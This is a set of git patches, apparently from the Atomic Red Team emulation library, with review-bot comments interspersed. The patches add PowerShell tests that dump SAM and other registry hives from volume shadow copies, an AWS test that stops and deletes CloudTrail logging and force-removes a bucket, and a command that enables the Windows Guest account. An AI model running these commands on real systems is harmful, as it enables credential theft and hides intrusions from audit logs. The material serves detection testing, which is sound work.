atomics/Indexes/Indexes-Markdown/index.md | 3 +- .../Indexes/Indexes-Markdown/windows-index.md | 3 +- atomics/Indexes/index.yaml | 53 +++++++++++++-- atomics/T1003.002/T1003.002.md | 66 ++++++++++++++++--- 6 files changed, 112 insertions(+), 19 deletions(-) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 55fa2871..e9380dbe 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv 
@@ -76,7 +76,8 @@ credential-access,T1003.002,Security Account Manager,1,"Registry dump of SAM, cr credential-access,T1003.002,Security Account Manager,2,Registry parse with pypykatz,a96872b2-cbf3-46cf-8eb4-27e8c0e85263,command_prompt credential-access,T1003.002,Security Account Manager,3,esentutl.exe SAM copy,a90c2f4d-6726-444e-99d2-a00cd7c20480,command_prompt credential-access,T1003.002,Security Account Manager,4,PowerDump Registry dump of SAM for hashes and usernames,804f28fc-68fc-40da-b5a2-e9d0bce5c193,powershell -credential-access,T1003.002,Security Account Manager,5,dump volume shadow copy hive with certutil,eeb9751a-d598-42d3-b11c-c122d9c3f6c7,powershell +credential-access,T1003.002,Security Account Manager,5,dump volume shadow copy hives with certutil,eeb9751a-d598-42d3-b11c-c122d9c3f6c7,powershell +credential-access,T1003.002,Security Account Manager,6,dump volume shadow copy hives with System.IO.File,9d77fed7-05f8-476e-a81b-8ff0472c64d0,powershell collection,T1560,Archive Collected Data,1,Compress Data for Exfiltration With PowerShell,41410c60-614d-4b9d-b66e-b0192dd9c597,powershell collection,T1560.002,Archive via Library,1,Compressing data using GZip in Python (Linux),391f5298-b12d-4636-8482-35d9c17d53a8,bash collection,T1560.002,Archive via Library,2,Compressing data using bz2 in Python (Linux),c75612b2-9de0-4d7c-879c-10d7b077072d,bash diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index 3f7d3f9e..3a96f7e7 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv 
@@ -52,7 +52,8 @@ credential-access,T1003.002,Security Account Manager,1,"Registry dump of SAM, cr credential-access,T1003.002,Security Account Manager,2,Registry parse with pypykatz,a96872b2-cbf3-46cf-8eb4-27e8c0e85263,command_prompt credential-access,T1003.002,Security Account Manager,3,esentutl.exe SAM copy,a90c2f4d-6726-444e-99d2-a00cd7c20480,command_prompt credential-access,T1003.002,Security Account Manager,4,PowerDump Registry dump of SAM for hashes and usernames,804f28fc-68fc-40da-b5a2-e9d0bce5c193,powershell -credential-access,T1003.002,Security Account Manager,5,dump volume shadow copy hive with certutil,eeb9751a-d598-42d3-b11c-c122d9c3f6c7,powershell +credential-access,T1003.002,Security Account Manager,5,dump volume shadow copy hives with certutil,eeb9751a-d598-42d3-b11c-c122d9c3f6c7,powershell +credential-access,T1003.002,Security Account Manager,6,dump volume shadow copy hives with System.IO.File,9d77fed7-05f8-476e-a81b-8ff0472c64d0,powershell collection,T1560,Archive Collected Data,1,Compress Data for Exfiltration With PowerShell,41410c60-614d-4b9d-b66e-b0192dd9c597,powershell collection,T1560.001,Archive via Utility,1,Compress Data for Exfiltration With Rar,02ea31cb-3b4c-4a2d-9bf1-e4e70ebcf5d0,command_prompt collection,T1560.001,Archive via Utility,2,Compress Data and lock with password for Exfiltration with winrar,8dd61a55-44c6-43cc-af0c-8bdda276860c,command_prompt diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index 8aa3bf01..12dbc257 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md 
@@ -122,7 +122,8 @@ - Atomic Test #2: Registry parse with pypykatz [windows] - Atomic Test #3: esentutl.exe SAM copy [windows] - Atomic Test #4: PowerDump Registry dump of SAM for hashes and usernames [windows] - - Atomic Test #5: dump volume shadow copy hive with certutil [windows] + - Atomic Test #5: dump volume shadow copy hives with certutil [windows] + - Atomic Test #6: dump volume shadow copy hives with System.IO.File [windows] - T1555.002 Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1558.002 Silver Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1528 Steal Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index a5799b2d..a3558cd7 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -90,7 +90,8 @@ - Atomic Test #2: Registry parse with pypykatz [windows] - Atomic Test #3: esentutl.exe SAM copy [windows] - Atomic Test #4: PowerDump Registry dump of SAM for hashes and usernames [windows] - - Atomic Test #5: dump volume shadow copy hive with certutil [windows] + - Atomic Test #5: dump volume shadow copy hives with certutil [windows] + - Atomic Test #6: dump volume shadow copy hives with System.IO.File [windows] - T1558.002 Silver Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1539 Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1558 Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 74487a9b..4cfe28ae 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml 
@@ -5440,19 +5440,23 @@ credential-access: Invoke-PowerDump name: powershell elevation_required: true - - name: dump volume shadow copy hive with certutil + - name: dump volume shadow copy hives with certutil auto_generated_guid: eeb9751a-d598-42d3-b11c-c122d9c3f6c7 description: | - Dump the SAM hive from volume shadow copies with the certutil utility + Dump hives from volume shadow copies with the certutil utility This can be done with a non-admin user account supported_platforms: - windows input_arguments: - file_path: + dump_path: description: Path where the hive will be dumped type: Path default: "$ENV:temp" - file_name: + target_hive: + description: Hive you wish to dump + type: String + default: SAM + dumped_hive: description: Name of the dumped hive type: String default: myhive 
@@ -5462,13 +5466,48 @@ credential-access: $shadowlist = get-wmiobject win32_shadowcopy $volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]} $maxvolume = ($volumenumbers | Sort-Object -Descending)[0] - $shadowpath = "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy" + $maxvolume + "\Windows\System32\config\SYSTEM" - certutil -f -v -encodehex $shadowpath #{file_path}\#{file_name} 2 + $shadowpath = "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy" + $maxvolume + "\Windows\System32\config\#{target_hive}" + certutil -f -v -encodehex $shadowpath #{dump_path}\#{dumped_hive} 2 name: powershell elevation_required: false cleanup_command: | write-host "" - $toremove = #{file_path} + "\" + '#{file_name}' + $toremove = #{dump_path} + "\" + '#{dumped_hive}' + rm $toremove + - name: dump volume shadow copy hives with System.IO.File + auto_generated_guid: 9d77fed7-05f8-476e-a81b-8ff0472c64d0 + description: 'Dump hives from volume shadow copies with System.IO.File + +' + supported_platforms: + - windows + input_arguments: + dump_path: + description: Path where the hive will be dumped + type: Path + default: "$ENV:temp" + target_hive: + description: Hive you wish to dump + type: String + default: SAM + dumped_hive: + description: Name of the dumped hive + type: String + default: myhive + executor: + command: | + write-host "" + $shadowlist = get-wmiobject win32_shadowcopy + $volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]} + $maxvolume = ($volumenumbers | Sort-Object -Descending)[0] + $shadowpath = "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy" + $maxvolume + "\Windows\System32\config\#{target_hive}" + $mydump = #{dump_path} + '\' + '#{dumped_hive}' + [System.IO.File]::Copy($shadowpath , $mydump) + name: powershell + elevation_required: false + cleanup_command: |- + write-host "" + $toremove = #{dump_path} + "\" + '#{dumped_hive}' rm $toremove T1555.002: technique: 
diff --git a/atomics/T1003.002/T1003.002.md b/atomics/T1003.002/T1003.002.md index 80948108..27f223f3 100644 --- a/atomics/T1003.002/T1003.002.md +++ b/atomics/T1003.002/T1003.002.md @@ -32,7 +32,9 @@ Notes: - [Atomic Test #4 - PowerDump Registry dump of SAM for hashes and usernames](#atomic-test-4---powerdump-registry-dump-of-sam-for-hashes-and-usernames) -- [Atomic Test #5 - dump volume shadow copy hive with certutil](#atomic-test-5---dump-volume-shadow-copy-hive-with-certutil) +- [Atomic Test #5 - dump volume shadow copy hives with certutil](#atomic-test-5---dump-volume-shadow-copy-hives-with-certutil) + +- [Atomic Test #6 - dump volume shadow copy hives with System.IO.File](#atomic-test-6---dump-volume-shadow-copy-hives-with-systemiofile)
@@ -209,8 +211,8 @@ Invoke-PowerDump

-## Atomic Test #5 - dump volume shadow copy hive with certutil -Dump the SAM hive from volume shadow copies with the certutil utility +## Atomic Test #5 - dump volume shadow copy hives with certutil +Dump hives from volume shadow copies with the certutil utility This can be done with a non-admin user account **Supported Platforms:** Windows @@ -225,8 +227,9 @@ This can be done with a non-admin user account #### Inputs: | Name | Description | Type | Default Value | |------|-------------|------|---------------| -| file_path | Path where the hive will be dumped | Path | $ENV:temp| -| file_name | Name of the dumped hive | String | myhive| +| dump_path | Path where the hive will be dumped | Path | $ENV:temp| +| target_hive | Hive you wish to dump | String | SAM| +| dumped_hive | Name of the dumped hive | String | myhive| #### Attack Commands: Run with `powershell`! @@ -237,14 +240,61 @@ write-host "" $shadowlist = get-wmiobject win32_shadowcopy $volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]} $maxvolume = ($volumenumbers | Sort-Object -Descending)[0] -$shadowpath = "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy" + $maxvolume + "\Windows\System32\config\SYSTEM" -certutil -f -v -encodehex $shadowpath #{file_path}\#{file_name} 2 +$shadowpath = "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy" + $maxvolume + "\Windows\System32\config\#{target_hive}" +certutil -f -v -encodehex $shadowpath #{dump_path}\#{dumped_hive} 2 ``` #### Cleanup Commands: ```powershell write-host "" -$toremove = #{file_path} + "\" + '#{file_name}' +$toremove = #{dump_path} + "\" + '#{dumped_hive}' +rm $toremove +``` + + + + + +
+
+ +## Atomic Test #6 - dump volume shadow copy hives with System.IO.File +Dump hives from volume shadow copies with System.IO.File + +**Supported Platforms:** Windows + + +**auto_generated_guid:** 9d77fed7-05f8-476e-a81b-8ff0472c64d0 + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| dump_path | Path where the hive will be dumped | Path | $ENV:temp| +| target_hive | Hive you wish to dump | String | SAM| +| dumped_hive | Name of the dumped hive | String | myhive| + + +#### Attack Commands: Run with `powershell`! + + +```powershell +write-host "" +$shadowlist = get-wmiobject win32_shadowcopy +$volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]} +$maxvolume = ($volumenumbers | Sort-Object -Descending)[0] +$shadowpath = "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy" + $maxvolume + "\Windows\System32\config\#{target_hive}" +$mydump = #{dump_path} + '\' + '#{dumped_hive}' +[System.IO.File]::Copy($shadowpath , $mydump) +``` + +#### Cleanup Commands: +```powershell +write-host "" +$toremove = #{dump_path} + "\" + '#{dumped_hive}' rm $toremove ``` From 6fe437d2c1fb125a5ae3283d6f09843fbe7d8332 Mon Sep 17 00:00:00 2001 From: Araveti Esanya Reddy Date: Tue, 10 Aug 2021 12:23:02 +0530 Subject: [PATCH 10/39] Automated AWS cloudtrail changes --- atomics/T1562.008/T1562.008.yaml | 37 ++++++++++++++++++++++++++++++++ 1 file changed, 37 insertions(+) create mode 100644 atomics/T1562.008/T1562.008.yaml diff --git a/atomics/T1562.008/T1562.008.yaml b/atomics/T1562.008/T1562.008.yaml new file mode 100644 index 00000000..a40bdb36 --- /dev/null +++ b/atomics/T1562.008/T1562.008.yaml 
@@ -0,0 +1,37 @@ +attack_technique: T1562.008 +display_name: 'Impair Defenses: Disable Cloud Logs' +atomic_tests: +- name: AWS CloudTrail Changes + auto_generated_guid: 9c10dc6b-20bd-403a-8e67-50ef7d07ed4e + description: | + Creates a new cloudTrail in AWS, Upon successful creation it will Update,Stop and Delete the cloudTrail + supported_platforms: + - iaas:aws + input_arguments: + cloudtrail_name: + description: Name of the cloudTrail + type: String + default: "redatomictesttrail" + s3_bucket_name: + description: Name of the bucket + type: String + default: "functionaltesttrail" + region: + description: Name of the region + type: String + default: "us-east-1" + dependencies: + - description: | + Check if ~/.aws/credentials file has a default stanza is configured + prereq_command: | + cat ~/.aws/credentials | grep "default" + get_prereq_command: | + echo Please install the aws-cli and configure your AWS defult profile using: aws configure + executor: + command: | + aws cloudtrail create-trail --name #{cloudtrail_name} --s3-bucket-name #{s3_bucket_name} --region #{region} + aws cloudtrail update-trail --name #{cloudtrail_name} --s3-bucket-name #{s3_bucket_name} --is-multi-region-trail --region #{region} + aws cloudtrail stop-logging --name #{cloudtrail_name} --region #{region} + aws cloudtrail delete-trail --name #{cloudtrail_name} --region #{region} + name: sh + elevation_required: false From cd8ea24c61dcc53e728c62890459329ca2d208c9 Mon Sep 17 00:00:00 2001 From: Araveti Esanya Reddy Date: Wed, 11 Aug 2021 16:47:31 +0530 Subject: [PATCH 11/39] updated bucket policy --- atomics/T1562.008/T1562.008.yaml | 5 ++++- atomics/T1562.008/policy.json | 28 ++++++++++++++++++++++++++++ 2 files changed, 32 insertions(+), 1 deletion(-) create mode 100644 atomics/T1562.008/policy.json diff --git a/atomics/T1562.008/T1562.008.yaml b/atomics/T1562.008/T1562.008.yaml index a40bdb36..ccddbecf 100644 --- a/atomics/T1562.008/T1562.008.yaml +++ b/atomics/T1562.008/T1562.008.yaml 
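Review bot: The `prereq_command` `cat ~/.aws/credentials | grep "default"` matches any line containing the word `default` (a profile name, a key value, a comment) rather than the `[default]` stanza the description asks for, and the `cat` is unnecessary; `grep -q '^\[default\]' ~/.aws/credentials` checks the stanza itself and leaves the exit status as the only output. In the executor the four `aws cloudtrail` calls are independent `sh` lines, so when `create-trail` fails — which it typically will until the bucket carries a policy allowing CloudTrail to write to it — `update-trail`, `stop-logging` and `delete-trail` still run and report errors against a trail that was never created; chaining them with `&&` keeps the failure at the step that caused it. The `get_prereq_command` message misspells `defult`. Readers of the description would also benefit from a sentence saying that `StopLogging` and `DeleteTrail` are the CloudTrail management events this test is meant to exercise, since the create/update steps are only setup.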
@@ -15,7 +15,7 @@ atomic_tests: s3_bucket_name: description: Name of the bucket type: String - default: "functionaltesttrail" + default: "redatomic-test" region: description: Name of the region type: String @@ -25,6 +25,8 @@ atomic_tests: Check if ~/.aws/credentials file has a default stanza is configured prereq_command: | cat ~/.aws/credentials | grep "default" + aws s3api create-bucket --bucket #{s3_bucket_name} --region #{region} + aws s3api put-bucket-policy --bucket redatomic-test --policy file://$PathToAtomicsFolder/T1562.008/policy.json get_prereq_command: | echo Please install the aws-cli and configure your AWS defult profile using: aws configure executor: @@ -33,5 +35,6 @@ atomic_tests: aws cloudtrail update-trail --name #{cloudtrail_name} --s3-bucket-name #{s3_bucket_name} --is-multi-region-trail --region #{region} aws cloudtrail stop-logging --name #{cloudtrail_name} --region #{region} aws cloudtrail delete-trail --name #{cloudtrail_name} --region #{region} + aws s3 rb s3://#{s3_bucket_name} --force name: sh elevation_required: false diff --git a/atomics/T1562.008/policy.json b/atomics/T1562.008/policy.json new file mode 100644 index 00000000..ac55e733 --- /dev/null +++ b/atomics/T1562.008/policy.json @@ -0,0 +1,28 @@ +{ + "Version": "2012-10-17", + "Statement": [ + { + "Sid": "AWSCloudTrailAclCheck20150319", + "Effect": "Allow", + "Principal": { + "Service": "cloudtrail.amazonaws.com" + }, + "Action": "s3:GetBucketAcl", + "Resource": "arn:aws:s3:::redatomic-test" + }, + { + "Sid": "AWSCloudTrailWrite20150319", + "Effect": "Allow", + "Principal": { + "Service": "cloudtrail.amazonaws.com" + }, + "Action": "s3:PutObject", + "Resource": "arn:aws:s3:::redatomic-test/AWSLogs/*", + "Condition": { + "StringEquals": { + "s3:x-amz-acl": "bucket-owner-full-control" + } + } + } + ] +} From b4c10e2fa8193ef21c9eb36fe74689346e57e901 Mon Sep 17 00:00:00 2001 
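Review bot: In the `@@ -25,6 +25,8 @@` hunk the two `aws s3api` calls are added to `prereq_command`, which the framework runs to check whether prerequisites are met, so every prerequisite check now creates a bucket and rewrites its policy; they belong in `get_prereq_command`, with `prereq_command` left as a read-only check such as `aws s3api head-bucket --bucket #{s3_bucket_name}`. The `put-bucket-policy --bucket redatomic-test` line hardcodes the bucket name instead of using `#{s3_bucket_name}`, and `policy.json` hardcodes `arn:aws:s3:::redatomic-test` in both `Resource` ARNs, so overriding the input argument creates a bucket the policy never covers and `create-trail` then fails. S3 bucket names are global, so a fixed default such as `redatomic-test` will collide with an existing bucket for most users; a default with an account- or run-specific suffix avoids that, and `create-bucket` outside `us-east-1` additionally needs `--create-bucket-configuration LocationConstraint=#{region}`.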
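Review bot: In the `@@ -33,5 +35,6 @@` hunk `aws s3 rb s3://#{s3_bucket_name} --force` runs as part of the attack command itself, so a user who points `s3_bucket_name` at a pre-existing bucket loses its entire contents, and the bucket is removed even when the trail steps before it failed. Bucket removal is teardown, not part of the technique; move it to a `cleanup_command:` block so the attack steps end with the CloudTrail calls and the destructive step is opt-in and separately visible in the framework's output. Because the bucket is created by the prerequisite step, the cleanup should only remove a bucket the test created, not one supplied by the user.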
From: DS <31036535+security-geek@users.noreply.github.com> Date: Thu, 12 Aug 2021 12:27:45 +1000 Subject: [PATCH 12/39] Update T1078.001.yaml (#1589) --- atomics/T1078.001/T1078.001.yaml | 16 ++++++++++++++++ 1 file changed, 16 insertions(+) diff --git a/atomics/T1078.001/T1078.001.yaml b/atomics/T1078.001/T1078.001.yaml index 3fe801b2..fb3d2230 100644 --- a/atomics/T1078.001/T1078.001.yaml +++ b/atomics/T1078.001/T1078.001.yaml @@ -38,3 +38,19 @@ atomic_tests: if #{remove_rdp_access_during_cleanup} EQU 1 (reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f >nul 2>&1) name: command_prompt elevation_required: true + +- name: Activate Guest Account + description: | + The Adversaries can activate the default Guest user. The guest account is inactivated by default + supported_platforms: + - windows + executor: + command: | + net user guest /active:yes + cleanup_command: | + net user guest /active:no + name: command_prompt + elevation_required: true + + + From d981e845fd3702cb703d3ec7756d2ab284945a7b Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Thu, 12 Aug 2021 02:28:06 +0000 Subject: [PATCH 13/39] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/T1078.001/T1078.001.yaml | 1 + atomics/used_guids.txt | 1 + 2 files changed, 2 insertions(+) diff --git a/atomics/T1078.001/T1078.001.yaml b/atomics/T1078.001/T1078.001.yaml index fb3d2230..a5e8ad5d 100644 --- a/atomics/T1078.001/T1078.001.yaml +++ b/atomics/T1078.001/T1078.001.yaml @@ -40,6 +40,7 @@ atomic_tests: elevation_required: true - name: Activate Guest Account + auto_generated_guid: aa6cb8c4-b582-4f8e-b677-37733914abda description: | The Adversaries can activate the default Guest user. The guest account is inactivated by default supported_platforms: diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index 04ced245..aa96fbf8 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt 
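Review bot: The `cleanup_command` `net user guest /active:no` disables the account unconditionally, so on a host where Guest was already enabled before the run the cleanup changes system state instead of restoring it; either capture the prior state in the executor (for example `net user guest | findstr /i "Account active"` before the `/active:yes` call) or state in the description that the test assumes the default disabled state. The name `guest` is the English built-in account name and may differ on localized Windows installs, which is worth a note in the description. `The Adversaries can activate the default Guest user. The guest account is inactivated by default` would read better as `Adversaries can activate the built-in Guest account, which is disabled by default`. The hunk also appends three blank lines at the end of the file.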
@@ -761,3 +761,4 @@ c4ae0701-88d3-4cd8-8bce-4801ed9f97e4 441b1a0f-a771-428a-8af0-e99e4698cda3 eeb9751a-d598-42d3-b11c-c122d9c3f6c7 9d77fed7-05f8-476e-a81b-8ff0472c64d0 +aa6cb8c4-b582-4f8e-b677-37733914abda From 370062439e856327c4be72afbd5834438092433f Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Thu, 12 Aug 2021 02:28:11 +0000 Subject: [PATCH 14/39] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 4 ++ atomics/Indexes/Indexes-CSV/windows-index.csv | 4 ++ atomics/Indexes/Indexes-Markdown/index.md | 4 ++ .../Indexes/Indexes-Markdown/windows-index.md | 4 ++ atomics/Indexes/index.yaml | 68 +++++++++++++++++++ atomics/T1078.001/T1078.001.md | 34 ++++++++++ 6 files changed, 118 insertions(+) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index e9380dbe..2b76f2d9 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv 
@@ -144,6 +144,7 @@ privilege-escalation,T1053.003,Cron,3,Cron - Add script to /var/spool/cron/cront privilege-escalation,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt privilege-escalation,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt privilege-escalation,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt +privilege-escalation,T1078.001,Default Accounts,2,Activate Guest Account,aa6cb8c4-b582-4f8e-b677-37733914abda,command_prompt privilege-escalation,T1574.006,Dynamic Linker Hijacking,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash privilege-escalation,T1574.006,Dynamic Linker Hijacking,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash privilege-escalation,T1055.001,Dynamic-link Library Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell 
@@ -268,6 +269,7 @@ defense-evasion,T1218.002,Control Panel,1,Control Panel Items,037e9d8a-9e46-4255 defense-evasion,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt defense-evasion,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt defense-evasion,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt +defense-evasion,T1078.001,Default Accounts,2,Activate Guest Account,aa6cb8c4-b582-4f8e-b677-37733914abda,command_prompt defense-evasion,T1140,Deobfuscate/Decode Files or Information,1,Deobfuscate/Decode Files Or Information,dc6fe391-69e6-4506-bd06-ea5eeb4082f8,command_prompt defense-evasion,T1140,Deobfuscate/Decode Files or Information,2,Certutil Rename and Decode,71abc534-3c05-4d0c-80f7-cbe93cb2aa94,command_prompt defense-evasion,T1140,Deobfuscate/Decode Files or Information,3,Base64 decoding with Python,356dc0e8-684f-4428-bb94-9313998ad608,sh 
@@ -544,6 +546,7 @@ persistence,T1053.003,Cron,3,Cron - Add script to /var/spool/cron/crontabs/ fold persistence,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt persistence,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt persistence,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt +persistence,T1078.001,Default Accounts,2,Activate Guest Account,aa6cb8c4-b582-4f8e-b677-37733914abda,command_prompt persistence,T1136.002,Domain Account,1,Create a new Windows domain admin user,fcec2963-9951-4173-9bfa-98d8b7834e62,command_prompt persistence,T1136.002,Domain Account,2,Create a new account similar to ANONYMOUS LOGON,dc7726d2-8ccb-4cc6-af22-0d5afb53a548,command_prompt persistence,T1136.002,Domain Account,3,Create a new Domain Account using PowerShell,5a3497a4-1568-4663-b12a-d4a5ed70c7d7,powershell 
@@ -914,6 +917,7 @@ exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol, exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,4,Exfiltration Over Alternative Protocol - HTTP,6aa58451-1121-4490-a8e9-1dada3f1c68c,powershell exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,5,Exfiltration Over Alternative Protocol - SMTP,ec3a835e-adca-4c7c-88d2-853b69c11bb9,powershell initial-access,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt +initial-access,T1078.001,Default Accounts,2,Activate Guest Account,aa6cb8c4-b582-4f8e-b677-37733914abda,command_prompt initial-access,T1133,External Remote Services,1,Running Chrome VPN Extensions via the Registry 2 vpn extension,4c8db261-a58b-42a6-a866-0a294deedde4,powershell initial-access,T1078.003,Local Accounts,1,Create local account with admin privileges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt initial-access,T1566.001,Spearphishing Attachment,1,Download Phishing Attachment - VBScript,114ccff9-ae6d-4547-9ead-4cd69f687306,powershell diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index 3a96f7e7..79e806ce 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv 
@@ -98,6 +98,7 @@ privilege-escalation,T1546.001,Change Default File Association,1,Change Default privilege-escalation,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt privilege-escalation,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt privilege-escalation,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt +privilege-escalation,T1078.001,Default Accounts,2,Activate Guest Account,aa6cb8c4-b582-4f8e-b677-37733914abda,command_prompt privilege-escalation,T1055.001,Dynamic-link Library Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell privilege-escalation,T1546.012,Image File Execution Options Injection,1,IFEO Add Debugger,fdda2626-5234-4c90-b163-60849a24c0b8,command_prompt privilege-escalation,T1546.012,Image File Execution Options Injection,2,IFEO Global Flags,46b1f278-c8ee-4aa5-acce-65e77b11f3c1,command_prompt 
@@ -181,6 +182,7 @@ defense-evasion,T1218.002,Control Panel,1,Control Panel Items,037e9d8a-9e46-4255 defense-evasion,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt defense-evasion,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt defense-evasion,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt +defense-evasion,T1078.001,Default Accounts,2,Activate Guest Account,aa6cb8c4-b582-4f8e-b677-37733914abda,command_prompt defense-evasion,T1140,Deobfuscate/Decode Files or Information,1,Deobfuscate/Decode Files Or Information,dc6fe391-69e6-4506-bd06-ea5eeb4082f8,command_prompt defense-evasion,T1140,Deobfuscate/Decode Files or Information,2,Certutil Rename and Decode,71abc534-3c05-4d0c-80f7-cbe93cb2aa94,command_prompt defense-evasion,T1006,Direct Volume Access,1,Read volume boot sector via DOS device path (PowerShell),88f6327e-51ec-4bbf-b2e8-3fea534eab8b,powershell 
@@ -371,6 +373,7 @@ persistence,T1546.001,Change Default File Association,1,Change Default File Asso persistence,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt persistence,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt persistence,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt +persistence,T1078.001,Default Accounts,2,Activate Guest Account,aa6cb8c4-b582-4f8e-b677-37733914abda,command_prompt persistence,T1136.002,Domain Account,1,Create a new Windows domain admin user,fcec2963-9951-4173-9bfa-98d8b7834e62,command_prompt persistence,T1136.002,Domain Account,2,Create a new account similar to ANONYMOUS LOGON,dc7726d2-8ccb-4cc6-af22-0d5afb53a548,command_prompt persistence,T1136.002,Domain Account,3,Create a new Domain Account using PowerShell,5a3497a4-1568-4663-b12a-d4a5ed70c7d7,powershell 
